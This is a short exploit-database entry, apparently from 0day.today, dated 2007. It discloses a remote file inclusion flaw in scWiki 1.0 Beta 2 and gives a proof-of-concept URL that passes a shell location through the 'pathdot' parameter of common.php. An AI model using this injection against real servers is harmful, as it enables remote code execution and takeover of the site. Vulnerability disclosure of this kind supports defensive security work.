id: 2269
date: 11/03/2007
title: scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vuln
author: GoLd_M
cves: 

=================================================================
scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vuln
=================================================================



scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/sc-wiki/scwiki_beta2.zip
POC :
    /includes/common.php?pathdot=Shell



#  0day.today [2023-03-25]  #